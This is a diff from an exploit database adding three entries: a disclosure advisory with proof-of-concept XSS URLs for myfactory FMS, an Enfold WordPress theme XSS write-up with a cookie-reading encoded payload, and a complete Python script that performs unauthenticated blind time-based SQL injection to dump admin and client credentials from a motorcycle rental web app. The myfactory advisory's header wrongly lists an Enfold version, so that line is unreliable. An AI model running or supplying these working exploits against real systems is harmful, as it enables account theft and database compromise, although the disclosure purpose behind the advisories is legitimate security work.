DB: 2021-10-20

10 changes to exploits/shellcodes

Mitsubishi Electric & INEA SmartRTU - Source Code Disclosure
Mitsubishi Electric & INEA SmartRTU - Reflected Cross-Site Scripting (XSS)
Mitsubishi Electric & INEA SmartRTU - Source Code Disclosure
Mitsubishi Electric & INEA SmartRTU - Reflected Cross-Site Scripting (XSS)
WordPress Theme Enfold 4.8.3 - Reflected Cross-Site Scripting (XSS)
myfactory FMS 7.1-911 - 'Multiple' Reflected Cross-Site Scripting (XSS)
Online Motorcycle (Bike) Rental System 1.0 - Blind Time-Based SQL Injection (Unauthenticated)

exploits/multiple/webapps/50428.txt

@@ -0,0 +1,133 @@
+# Exploit Title: myfactory FMS 7.1-911 - 'Multiple' Reflected Cross-Site Scripting (XSS)
+# Exploit Author: RedTeam Pentesting GmbH
+# Vendor Homepage: https://www.myfactory.com/
+# Version: Enfold < 4.8.4 (all versions)
+# Tested on: Ubuntu
+# CVE : CVE-2021-42565, CVE-2021-42566
+# Reference: https://www.redteam-pentesting.de/en/advisories/rt-sa-2021-001/-cross-site-scripting-in-myfactory-fms
+
+
+During a penetration test, a reflected cross-site scripting
+vulnerability (XSS) was found in the myfactory.FMS login form. If a user
+opens an attacker-prepared link to the application, attackers can run
+arbitrary JavaScript code in the user's browser.
+
+Introduction
+============
+
+"With myfactory, you get a modern accounting application for your business. It covers every functionality necessary for an accounting system."
+(translated from German from the vendor's homepage)
+
+More Details
+============
+
+The myfactory.FMS web application[0] allows users to login with a username and password. If the password is wrong, the application redirects to a URL similar to the following:
+
+http://www.example.com/ie50/system/login/SysLoginUser.aspx?Login=Denied&UID=RedTeam
+
+The application then opens a dialogue telling the user that their
+username or password are wrong and uses the value of the parameter UID
+to prefill the login form resulting in the following source code:
+
+------------------------------------------------------------------------
+<td>
+<input NAME="txtUID" VALUE="RedTeam"
+   onkeypress="OnKeyPress(event)" placeholder="Benutzername" >
+</td>
+------------------------------------------------------------------------
+
+The UID parameter gets reflected without applying any encoding to it.
+
+A similar problem arises when the login leads to an error. This introduces a new parameter named 'Error':
+
+http://www.example.com/ie50/system/login/SysLoginUser.aspx?Login=Error&Error=RedTeam_Error
+
+The value of the Error parameter gets appended without encoding in the
+javascript function mOnLoad resulting in the following code:
+
+------------------------------------------------------------------------
+function mOnLoad(
+{
+  var sParams;
+  alert('Das System konnte Sie nicht anmelden.\n RedTeam_Error');
+[...]
+------------------------------------------------------------------------
+
+
+Proof of Concept
+================
+
+The XSS in the UID parameter can be triggered with the following URL:
+
+http://www.example.com/ie50/system/login/SysLoginUser.aspx?Login=Denied&UID="><script>alert("RedTeam+Pentesting")</script><span+"
+
+This will lead to the following HTML returned by the server:
+
+------------------------------------------------------------------------
+<td>
+<input NAME="txtUID" VALUE=""><script>alert("RedTeam Pentesting")</script><span ""
+   onkeypress="OnKeyPress(event)" placeholder="Benutzername" >
+</td>
+------------------------------------------------------------------------
+
+To demonstrate the XSS via the Error parameter, the following URL can be
+used:
+
+http://www.example.com/ie50/system/login/SysLoginUser.aspx?Login=Error&Error=');alert("RedTeam+Pentesting");//
+
+This will lead to the following JavaScript embedded in the HTML website
+returned by the server:
+
+------------------------------------------------------------------------
+function mOnLoad(
+{
+  var sParams;
+  alert('Das System konnte Sie nicht anmelden.\n ');alert("RedTeam+Pentesting");//');
+[...]
+------------------------------------------------------------------------
+
+Workaround
+==========
+
+None
+
+
+Fix
+===
+
+Install Version 7.1-912 or later.
+
+
+Security Risk
+=============
+
+This security vulnerability allows to execute arbitrary JavaScript code in
+users' browsers if they access URLs prepared by attackers. This provides many
+different possibilities for further attacks against these users. The
+vulnerability could for example be exploited to display a fake login to obtain
+credentials and consequently access a company's accounting information. Since
+attackers might be able to get access to sensitive financial data, but users
+have to actively open an attacker-defined link, this vulnerability is estimated
+to pose a medium risk.
+
+
+Timeline
+========
+
+2021-05-07 Vulnerability identified
+2021-05-27 Customer approved disclosure to vendor
+2021-06-07 Vendor notified, support confirms vulnerability and
+           implements fix. Support says vendor does not agree to a
+           public advisory.
+2021-06-10 Vendor contacts RedTeam Pentesting, reiterates that
+           no advisory should be released. Vendor acknowledges
+           public release after 90 days.
+2021-10-04 Customer confirms update to fixed version
+2021-10-13 Advisory released
+2021-10-14 CVE-ID requested
+2021-10-18 CVE-ID assigned
+
+
+References
+==========
+[0] https://www.myfactory.com/myfactoryfms.aspx

exploits/php/webapps/47501.txt

@@ -5,7 +5,7 @@
 # Software Link: https://bolt.cm/
 # Version: up to date and 6.5
 # Tested on: Linux
-# CVE : CVE-2019-1759
+# CVE : CVE-2019-17591
 
 # last version
 

exploits/php/webapps/50427.txt

@@ -0,0 +1,26 @@
+# Exploit Title: WordPress Theme Enfold 4.8.3 - Reflected Cross-Site Scripting (XSS)
+# Google Dork: "inurl:avia-element-paging"
+# Date: 18/10/2021
+# Exploit Author: Francisco Díaz-Pache Alonso, Sergio Corral Cristo and David Álvarez Robles
+# Vendor Homepage: https://kriesi.at/
+# Version: Enfold < 4.8.4 (all versions)
+# Tested on: Ubuntu
+# CVE : CVE-2021-24719
+
+# Full disclosure and PoC on: https://blog.asturhackers.es/cross-site-scripting-xss-reflejado-en-tema-enfold-4-8-4-para-wordpress
+
+While navigating on WordPress sites with Enfold Theme previous than 4.8.4 version and Avia Page Builder, string “ProofOfConcept” can be reflected literally  on pagination numbers. Moreover, the parameter “avia-element-paging” appears and can be used for crafting Google Dork based searches.
+
+https://[hostname]/[path]?ProofOfConcept --> This URL must include pages shown by Enfold theme
+
+Changing the “ProofOfConcept” text with a Cross-Site-Scripting (XSS) payload, the page processes and executes it. This is a reflected Cross-Site-Scripting (XSS)  vulnerability. Find the following URL that includes the malicious payload.
+
+https://[hostname]/[path]/?%2527%253E%253Cscript%253Eeval%2528atob%2528%2522Y29uc29sZS5sb2coZG9j --> This URL must include pages shown by Enfold theme
+
+Payload (double encoded): this payload is double encoded in the URL from:
+'><script>eval(atob("Y29uc29sZS5sb2coZG9jdW1lbnQuY29va2llKQ=="))</script>
+
+Payload (base64): the “atob” payload is Base64 encoded from:
+console.log(document.cookie)
+
+Navigating to the crafted URL, the console log displays some cookies that are used by the affected site (i.e. cookies with no “HttpOnly” flag set). However, the payload can be easily configurable.

exploits/php/webapps/50429.py

@@ -0,0 +1,164 @@
+# Exploit Title: Online Motorcycle (Bike) Rental System 1.0 - Blind Time-Based SQL Injection (Unauthenticated)
+# Exploit Author: Chase Comardelle(CASO)
+# Date: October 18, 2021
+# Vendor Homepage: https://www.sourcecodester.com/php/14989/online-motorcycle-bike-rental-system-phpoop-source-code.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/bike_rental_0.zip
+# Tested on: Kali Linux, Apache, Mysql
+# Vendor: oretnom23
+# Version: v1.0
+# Exploit Description:
+# Online Motorcycle (Bike) Rental System is vulnerable to a Blind Time-Based SQL Injection attack. This can lead attackers to remotely dump MySql database credentials
+
+
+#EXAMPLE PAYLOAD - test@email.com' UNION SELECT IF((SELECT SUBSTRING((SELECT password from users where username='admin'),1,1)='1'),sleep(10),'a'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL;
+#EXAMPLE EXECUTION - python3 sqliExploit.py http://localhost/bike_rental/
+
+import requests
+import sys
+import urllib3
+import pyfiglet
+
+
+
+
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+
+
+proxies = {'http': 'http://127.0.0.1:8080', 'https': 'https://127.0.0.1:8080'}
+
+
+
+def find_clients_usernames(url):
+    clients = ""
+    cookies = {'Cookie:':'PHPSESSID='}
+    headers = {'DNT': '1', 'SEC-GPC': '1', 'Referer' : 'http://localhost/bike_rental/','Origin': 'http://localhost','X-Requested-With' : 'XMLHttpRequest','Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8'}
+    path = '/classes/Login.php?f=login_user'
+    position = 1
+    i=0
+    while i <len(chars) :
+        sqli = "email=test@email.com'UNION+SELECT+IF((SELECT+SUBSTRING((SELECT+GROUP_CONCAT(email+SEPARATOR+',')+from+clients),%s,1)='%s'),sleep(1),''),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+-&password=test" %(position,chars[i])
+        r = requests.post(url + path,data=sqli,headers=headers,cookies=cookies, verify=False)
+
+        if r.elapsed.total_seconds() > 1:
+            clients += chars[i]
+            i=0
+            position+=1
+        else:
+            i +=1
+    return clients
+
+
+def find_db_usernames(url):
+    users = ""
+    cookies = {'Cookie:':'PHPSESSID='}
+    headers = {'DNT': '1', 'SEC-GPC': '1', 'Referer' : 'http://localhost/bike_rental/','Origin': 'http://localhost','X-Requested-With' : 'XMLHttpRequest','Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8'}
+    path = '/classes/Login.php?f=login_user'
+    position = 1
+    i=0
+    while i <len(chars) :
+        sqli = "email=test@email.com'UNION+SELECT+IF((SELECT+SUBSTRING((SELECT+GROUP_CONCAT(username+SEPARATOR+',')+from+users),%s,1)='%s'),sleep(1),''),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+-&password=test" %(position,chars[i])
+        r = requests.post(url + path,data=sqli,headers=headers,cookies=cookies, verify=False)
+
+        if r.elapsed.total_seconds() > 1:
+            users += chars[i]
+            i=0
+            position+=1
+        else:
+            i +=1
+    return users
+
+def find_db_passwords(url):
+    passwords = ""
+    clientCount = 0
+    cookies = {'Cookie:':'PHPSESSID='}
+    headers = {'DNT': '1', 'SEC-GPC': '1', 'Referer' : 'http://localhost/bike_rental/','Origin': 'http://localhost','X-Requested-With' : 'XMLHttpRequest','Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8'}
+    path = '/classes/Login.php?f=login_user'
+    position = 1
+    i=0
+
+    while i <len(chars) :
+        sqli = "email=test@email.com'UNION+SELECT+IF((SELECT+SUBSTRING((SELECT+GROUP_CONCAT(password+SEPARATOR+',')+from+users),%s,1)='%s'),sleep(1),''),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+-&password=test" %(position,chars[i])
+        r = requests.post(url + path,data=sqli,headers=headers,cookies=cookies, verify=False)
+
+        if r.elapsed.total_seconds() > 1:
+            passwords += chars[i]
+            i=0
+            position+=1
+        else:
+            i +=1
+
+    return passwords
+
+def find_client_passwords(url):
+    passwords = ""
+    clientCount = 0
+    cookies = {'Cookie:':'PHPSESSID='}
+    headers = {'DNT': '1', 'SEC-GPC': '1', 'Referer' : 'http://localhost/bike_rental/','Origin': 'http://localhost','X-Requested-With' : 'XMLHttpRequest','Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8'}
+    path = '/classes/Login.php?f=login_user'
+    position = 1
+    i=0
+
+    while i <len(chars) :
+        sqli = "email=test@email.com'UNION+SELECT+IF((SELECT+SUBSTRING((SELECT+GROUP_CONCAT(password+SEPARATOR+',')+from+clients),%s,1)='%s'),sleep(1),''),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+-&password=test" %(position,chars[i])
+        r = requests.post(url + path,data=sqli,headers=headers,cookies=cookies, verify=False)
+
+        if r.elapsed.total_seconds() > 1:
+            passwords += chars[i]
+            i=0
+            position+=1
+        else:
+            i +=1
+
+    return passwords
+
+
+def create_table(users,passwords):
+
+
+    for  i in range(0,len(users)):
+       print(users[i]," | ",passwords[i])
+
+def print_header():
+    print("[*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*]")
+    print("[*]     Online Motorcycle (Bike) Rental System     [*]")
+    print("[*] Unauthenticated Blind Time-Based SQL Injection [*]")
+    print("[*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*]")
+    print("\n")
+    print(pyfiglet.figlet_format("      CAS0", font = "slant"  ))
+
+chars = [ 'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o',
+          'p','q','r','s','t','u','v','w','x','y','z','A','B','C','D',
+          'E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S',
+          'T','U','V','W','X','Y','Z','0','1','2','3','4','5','6','7',
+          '8','9','@','#',",",'.']
+
+
+
+if __name__ == "__main__":
+    try:
+        url = sys.argv[1].strip()
+    except IndexError:
+        print("[-] Usage: %s <url>" % sys.argv[0])
+        print("[-] Example: %s www.example.com" % sys.argv[0])
+        sys.exit(-1)
+
+
+print_header()
+print("[*] RETRIEVING CREDENTIALS NOW [*]")
+dbUsernames = find_db_usernames(url)
+dbUsernames = dbUsernames.split(",")
+
+dbPasswords = find_db_passwords(url)
+dbPasswords = dbPasswords.split(",")
+
+print("[*] DATABASE CREDENTIALS [*]")
+create_table(dbUsernames,dbPasswords)
+
+clientUsernames = find_clients_usernames(url)
+clientsUsernames = clientUsernames.split(",")
+
+clientPasswords = find_client_passwords(url)
+clientPasswords = clientPasswords.split(",")
+
+print("[*] CLIENT CREDENTIALS [*]")
+create_table(clientsUsernames,clientPasswords)

files_exploits.csv

@@ -44368,8 +44368,11 @@ id,file,description,date,author,type,platform,port
 50419,exploits/php/webapps/50419.txt,"Support Board 3.3.4 - 'Message' Stored Cross-Site Scripting (XSS)",1970-01-01,"John Jefferson Li",webapps,php,
 50420,exploits/php/webapps/50420.py,"Wordpress Plugin Duplicator 1.3.26 - Unauthenticated Arbitrary File Read",1970-01-01,nam3lum,webapps,php,
 50421,exploits/php/webapps/50421.txt,"Company's Recruitment Management System 1.0. - 'title' Stored Cross-Site Scripting (XSS)",1970-01-01,"Aniket Deshmane",webapps,php,
-50422,exploits/php/webapps/50422.txt,"Mitsubishi Electric & INEA SmartRTU - Source Code Disclosure",1970-01-01,"Hamit CİBO",webapps,php,
-50423,exploits/php/webapps/50423.txt,"Mitsubishi Electric & INEA SmartRTU - Reflected Cross-Site Scripting (XSS)",1970-01-01,"Hamit CİBO",webapps,php,
+50422,exploits/hardware/webapps/50422.txt,"Mitsubishi Electric & INEA SmartRTU - Source Code Disclosure",1970-01-01,"Hamit CİBO",webapps,hardware,
+50423,exploits/hardware/webapps/50423.txt,"Mitsubishi Electric & INEA SmartRTU - Reflected Cross-Site Scripting (XSS)",1970-01-01,"Hamit CİBO",webapps,hardware,
 50424,exploits/php/webapps/50424.txt,"Company's Recruitment Management System 1.0 - 'description' Stored Cross-Site Scripting (XSS)",1970-01-01,"Aniket Deshmane",webapps,php,
 50425,exploits/php/webapps/50425.txt,"Company's Recruitment Management System 1.0 - 'Add New user' Cross-Site Request Forgery (CSRF)",1970-01-01,"Aniket Deshmane",webapps,php,
 50426,exploits/multiple/webapps/50426.txt,"Plastic SCM 10.0.16.5622 - WebAdmin Server Access",1970-01-01,"Basavaraj Banakar",webapps,multiple,
+50427,exploits/php/webapps/50427.txt,"WordPress Theme Enfold 4.8.3 - Reflected Cross-Site Scripting (XSS)",1970-01-01,"David Álvarez Robles",webapps,php,
+50428,exploits/multiple/webapps/50428.txt,"myfactory FMS 7.1-911 - 'Multiple' Reflected Cross-Site Scripting (XSS)",1970-01-01,"RedTeam Pentesting GmbH",webapps,multiple,
+50429,exploits/php/webapps/50429.py,"Online Motorcycle (Bike) Rental System 1.0 - Blind Time-Based SQL Injection (Unauthenticated)",1970-01-01,"Chase Comardelle",webapps,php,